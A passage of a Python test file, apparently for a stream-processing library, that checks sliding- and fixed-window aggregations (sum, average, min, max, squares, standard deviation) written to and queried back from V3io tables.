'number_of_stuff_max_24h': 2, 'number_of_stuff_sqr_1h': 5, 'number_of_stuff_sqr_2h': 5, 'number_of_stuff_sqr_24h': 5,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_sqr_1h': 14, 'number_of_stuff_sqr_2h': 14, 'number_of_stuff_sqr_24h': 14,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_sqr_1h': 29, 'number_of_stuff_sqr_2h': 30, 'number_of_stuff_sqr_24h': 30,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_sqr_1h': 50, 'number_of_stuff_sqr_2h': 55, 'number_of_stuff_sqr_24h': 55,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_sqr_1h': 77, 'number_of_stuff_sqr_2h': 90, 'number_of_stuff_sqr_24h': 91,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_sqr_1h': 110, 'number_of_stuff_sqr_2h': 135, 'number_of_stuff_sqr_24h': 140,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_sqr_1h': 149, 'number_of_stuff_sqr_2h': 190, 'number_of_stuff_sqr_24h': 204,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_sqr_1h': 194, 'number_of_stuff_sqr_2h': 255, 'number_of_stuff_sqr_24h': 285,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
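
    # Sanity check on the expected values above (events arrive 25 minutes
    # apart): a '1h' sliding window can hold at most three such events, so
    # at col1 == 9 the window covers the values 7, 8 and 9, giving
    #     sum_1h = 7 + 8 + 9 = 24,  min_1h = 7,  max_1h = 9,  avg_1h = 8.0
    # which matches the last entry of expected_results.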
tables = [table, Table(setup_teardown_test, V3ioDriver())] # test on previous table and on new table
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17.0, 'number_of_stuff_min_1h': 8.0,
'number_of_stuff_max_1h': 9.0, 'number_of_stuff_avg_1h': 8.5},
{'col1': 10, 'number_of_stuff_sum_1h': 9.0, 'number_of_stuff_min_1h': 9.0,
'number_of_stuff_max_1h': 9.0, 'number_of_stuff_avg_1h': 9.0},
]
for table in tables:
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h', 'number_of_stuff_avg_1h', 'number_of_stuff_min_1h', 'number_of_stuff_max_1h'],
table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.emit(data, 'tal', base_time + timedelta(minutes=25))
controller.terminate()
actual = controller.await_termination()
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_aggregate_and_query_with_different_fixed_windows(setup_teardown_test, partitioned_by_key, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1',
['sum', 'avg', 'min', 'max', 'sqr'],
FixedWindows(['1h', '2h', '24h']))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_max_1h': 0.0, 'number_of_stuff_max_2h': 0.0, 'number_of_stuff_max_24h': 0.0,
'number_of_stuff_sqr_1h': 0.0, 'number_of_stuff_sqr_2h': 0.0, 'number_of_stuff_sqr_24h': 0.0,
'number_of_stuff_sum_1h': 0.0, 'number_of_stuff_sum_2h': 0.0, 'number_of_stuff_sum_24h': 0.0,
'number_of_stuff_min_1h': 0.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_max_1h': 1.0, 'number_of_stuff_sqr_1h': 1.0, 'number_of_stuff_sum_1h': 1.0,
'number_of_stuff_min_1h': 1.0, 'number_of_stuff_max_2h': 1.0, 'number_of_stuff_sqr_2h': 1.0,
'number_of_stuff_sum_2h': 1.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_max_24h': 1.0,
'number_of_stuff_sqr_24h': 1.0, 'number_of_stuff_sum_24h': 1.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_max_1h': 2.0, 'number_of_stuff_max_2h': 2.0, 'number_of_stuff_max_24h': 2.0,
'number_of_stuff_sqr_1h': 5.0, 'number_of_stuff_sqr_2h': 5.0, 'number_of_stuff_sqr_24h': 5.0,
'number_of_stuff_sum_1h': 3.0, 'number_of_stuff_sum_2h': 3.0, 'number_of_stuff_sum_24h': 3.0,
'number_of_stuff_min_1h': 1.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 1.5, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_max_1h': 3.0, 'number_of_stuff_max_2h': 3.0, 'number_of_stuff_max_24h': 3.0,
'number_of_stuff_sqr_1h': 14.0, 'number_of_stuff_sqr_2h': 14.0, 'number_of_stuff_sqr_24h': 14.0,
'number_of_stuff_sum_1h': 6.0, 'number_of_stuff_sum_2h': 6.0, 'number_of_stuff_sum_24h': 6.0,
'number_of_stuff_min_1h': 1.0, 'number_of_stuff_min_2h': 0.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_max_1h': 4.0, 'number_of_stuff_sqr_1h': 16.0, 'number_of_stuff_sum_1h': 4.0,
'number_of_stuff_min_1h': 4.0, 'number_of_stuff_max_2h': 4.0, 'number_of_stuff_sqr_2h': 30.0,
'number_of_stuff_sum_2h': 10.0, 'number_of_stuff_min_2h': 1.0, 'number_of_stuff_max_24h': 4.0,
'number_of_stuff_sqr_24h': 30.0, 'number_of_stuff_sum_24h': 10.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 2.5, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_max_1h': 5.0, 'number_of_stuff_max_2h': 5.0, 'number_of_stuff_max_24h': 5.0,
'number_of_stuff_sqr_1h': 41.0, 'number_of_stuff_sqr_2h': 55.0, 'number_of_stuff_sqr_24h': 55.0,
'number_of_stuff_sum_1h': 9.0, 'number_of_stuff_sum_2h': 15.0, 'number_of_stuff_sum_24h': 15.0,
'number_of_stuff_min_1h': 4.0, 'number_of_stuff_min_2h': 1.0, 'number_of_stuff_min_24h': 0.0,
'number_of_stuff_avg_1h': 4.5, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_max_1h': 6.0, 'number_of_stuff_sqr_1h': 36.0, 'number_of_stuff_sum_1h': 6.0,
'number_of_stuff_min_1h': 6.0, 'number_of_stuff_max_2h': 6.0, 'number_of_stuff_sqr_2h': 36.0,
'number_of_stuff_sum_2h': 6.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_max_24h': 6.0,
'number_of_stuff_sqr_24h': 36.0, 'number_of_stuff_sum_24h': 6.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 6.0, 'col1': 6},
{'number_of_stuff_max_1h': 7.0, 'number_of_stuff_max_2h': 7.0, 'number_of_stuff_max_24h': 7.0,
'number_of_stuff_sqr_1h': 85.0, 'number_of_stuff_sqr_2h': 85.0, 'number_of_stuff_sqr_24h': 85.0,
'number_of_stuff_sum_1h': 13.0, 'number_of_stuff_sum_2h': 13.0, 'number_of_stuff_sum_24h': 13.0,
'number_of_stuff_min_1h': 6.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 6.5, 'number_of_stuff_avg_2h': 6.5, 'number_of_stuff_avg_24h': 6.5, 'col1': 7},
{'number_of_stuff_max_1h': 8.0, 'number_of_stuff_sqr_1h': 64.0, 'number_of_stuff_sum_1h': 8.0,
'number_of_stuff_min_1h': 8.0, 'number_of_stuff_max_2h': 8.0, 'number_of_stuff_sqr_2h': 149.0,
'number_of_stuff_sum_2h': 21.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_max_24h': 8.0,
'number_of_stuff_sqr_24h': 149.0, 'number_of_stuff_sum_24h': 21.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 7.0, 'col1': 8},
{'number_of_stuff_max_1h': 9.0, 'number_of_stuff_max_2h': 9.0, 'number_of_stuff_max_24h': 9.0,
'number_of_stuff_sqr_1h': 145.0, 'number_of_stuff_sqr_2h': 230.0, 'number_of_stuff_sqr_24h': 230.0,
'number_of_stuff_sum_1h': 17.0, 'number_of_stuff_sum_2h': 30.0, 'number_of_stuff_sum_24h': 30.0,
'number_of_stuff_min_1h': 8.0, 'number_of_stuff_min_2h': 6.0, 'number_of_stuff_min_24h': 6.0,
'number_of_stuff_avg_1h': 8.5, 'number_of_stuff_avg_2h': 7.5, 'number_of_stuff_avg_24h': 7.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
tables = [table, Table(setup_teardown_test, V3ioDriver())] # test on previous table and on new table
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17.0, 'number_of_stuff_min_1h': 8.0,
'number_of_stuff_max_1h': 9.0, 'number_of_stuff_avg_1h': 8.5},
{'col1': 10, 'number_of_stuff_sum_1h': 0.0, 'number_of_stuff_min_1h': math.inf,
'number_of_stuff_max_1h': -math.inf, 'number_of_stuff_avg_1h': math.nan},
]
for table in tables:
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h', 'number_of_stuff_avg_1h', 'number_of_stuff_min_1h', 'number_of_stuff_max_1h'],
table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.emit(data, 'tal', base_time + timedelta(minutes=25))
controller.terminate()
actual = controller.await_termination()
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
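
# Unlike SlidingWindows, FixedWindows are aligned to absolute window
# boundaries, so aggregations reset when an event falls into a new window --
# visible above where the col1 == 6 entry starts over with min/max/sum all
# equal to 6. An empty fixed window queries back as the identity values
# (sum 0.0, min inf, max -inf, avg nan), as the second expected query
# result shows.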
def test_query_virtual_aggregations_flow(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['avg', 'stddev', 'stdvar'],
SlidingWindows(['24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'dina', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_avg_24h': 0.0, 'number_of_stuff_stddev_24h': math.nan, 'number_of_stuff_stdvar_24h': math.nan},
{'col1': 1, 'number_of_stuff_avg_24h': 0.5, 'number_of_stuff_stddev_24h': math.sqrt(0.5), 'number_of_stuff_stdvar_24h': 0.5},
{'col1': 2, 'number_of_stuff_avg_24h': 1.0, 'number_of_stuff_stddev_24h': 1.0, 'number_of_stuff_stdvar_24h': 1.0},
{'col1': 3, 'number_of_stuff_avg_24h': 1.5, 'number_of_stuff_stddev_24h': math.sqrt(1.6666666666666667),
'number_of_stuff_stdvar_24h': 1.6666666666666667},
{'col1': 4, 'number_of_stuff_avg_24h': 2.0, 'number_of_stuff_stddev_24h': math.sqrt(2.5), 'number_of_stuff_stdvar_24h': 2.5},
{'col1': 5, 'number_of_stuff_avg_24h': 2.5, 'number_of_stuff_stddev_24h': math.sqrt(3.5), 'number_of_stuff_stdvar_24h': 3.5},
{'col1': 6, 'number_of_stuff_avg_24h': 3.0, 'number_of_stuff_stddev_24h': math.sqrt(4.666666666666667),
'number_of_stuff_stdvar_24h': 4.666666666666667},
{'col1': 7, 'number_of_stuff_avg_24h': 3.5, 'number_of_stuff_stddev_24h': math.sqrt(6.0), 'number_of_stuff_stdvar_24h': 6.0},
{'col1': 8, 'number_of_stuff_avg_24h': 4.0, 'number_of_stuff_stddev_24h': math.sqrt(7.5), 'number_of_stuff_stdvar_24h': 7.5},
{'col1': 9, 'number_of_stuff_avg_24h': 4.5, 'number_of_stuff_stddev_24h': math.sqrt(9.166666666666666),
'number_of_stuff_stdvar_24h': 9.166666666666666}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
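
    # Worked check for one expected value above: 'stdvar' is the sample
    # variance. For the first four inputs 0, 1, 2, 3 the mean is 1.5, the
    # squared deviations sum to 2.25 + 0.25 + 0.25 + 2.25 = 5.0, and
    # dividing by n - 1 = 3 gives 5 / 3 = 1.6666..., matching the
    # col1 == 3 entry (and stddev is its square root).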
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_avg_1h', 'number_of_stuff_stdvar_2h', 'number_of_stuff_stddev_3h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'dina', base_time)
controller.emit(data, 'dina', base_time + timedelta(minutes=25))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_avg_1h': 8.5, 'number_of_stuff_stdvar_2h': 1.6666666666666667,
'number_of_stuff_stddev_3h': 1.8708286933869707},
{'col1': 10, 'number_of_stuff_avg_1h': 9.0, 'number_of_stuff_stdvar_2h': 1.0, 'number_of_stuff_stddev_3h': 1.8708286933869707},
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_query_aggregate_by_key(setup_teardown_test, partitioned_by_key, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max', 'sqr'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_sqr_1h': 0, 'number_of_stuff_sqr_2h': 0, 'number_of_stuff_sqr_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_sqr_1h': 1, 'number_of_stuff_sqr_2h': 1, 'number_of_stuff_sqr_24h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_sqr_1h': 5, 'number_of_stuff_sqr_2h': 5, 'number_of_stuff_sqr_24h': 5,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_sqr_1h': 14, 'number_of_stuff_sqr_2h': 14, 'number_of_stuff_sqr_24h': 14,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_sqr_1h': 29, 'number_of_stuff_sqr_2h': 30, 'number_of_stuff_sqr_24h': 30,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_sqr_1h': 50, 'number_of_stuff_sqr_2h': 55, 'number_of_stuff_sqr_24h': 55,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_sqr_1h': 77, 'number_of_stuff_sqr_2h': 90, 'number_of_stuff_sqr_24h': 91,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_sqr_1h': 110, 'number_of_stuff_sqr_2h': 135, 'number_of_stuff_sqr_24h': 140,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_sqr_1h': 149, 'number_of_stuff_sqr_2h': 190, 'number_of_stuff_sqr_24h': 204,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_sqr_1h': 194, 'number_of_stuff_sqr_2h': 255, 'number_of_stuff_sqr_24h': 285,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h', 'number_of_stuff_sum_2h', 'number_of_stuff_sum_24h',
'number_of_stuff_avg_1h', 'number_of_stuff_avg_2h', 'number_of_stuff_avg_24h',
'number_of_stuff_min_1h', 'number_of_stuff_min_2h', 'number_of_stuff_min_24h',
'number_of_stuff_max_1h', 'number_of_stuff_max_2h', 'number_of_stuff_max_24h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 45,
'number_of_stuff_min_1h': 8, 'number_of_stuff_min_2h': 6, 'number_of_stuff_min_24h': 0,
'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9, 'number_of_stuff_max_24h': 9,
'number_of_stuff_avg_1h': 8.5, 'number_of_stuff_avg_2h': 7.5, 'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('query_aggregations', [['number_of_stuff_sum_1h', 'number_of_stuff_avg_2h'],
['number_of_stuff_avg_2h', 'number_of_stuff_sum_1h']])
def test_aggregate_and_query_with_dependent_aggrs_different_windows(setup_teardown_test, query_aggregations):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg'],
SlidingWindows(['1h', '2h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(query_aggregations,
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17, 'number_of_stuff_avg_2h': 7.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
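
# The parametrization above runs the query twice with the requested
# aggregation names in both orders. 'number_of_stuff_avg_2h' is not stored
# directly -- it is derived from the persisted sum and count -- so swapping
# the order guards against resolution bugs that depend on which dependent
# feature is requested first.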
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_aggregate_by_key_one_underlying_window(setup_teardown_test, partitioned_by_key, flush_interval):
expected = {1: [{'number_of_stuff_count_1h': 1, 'other_stuff_sum_1h': 0.0, 'col1': 0},
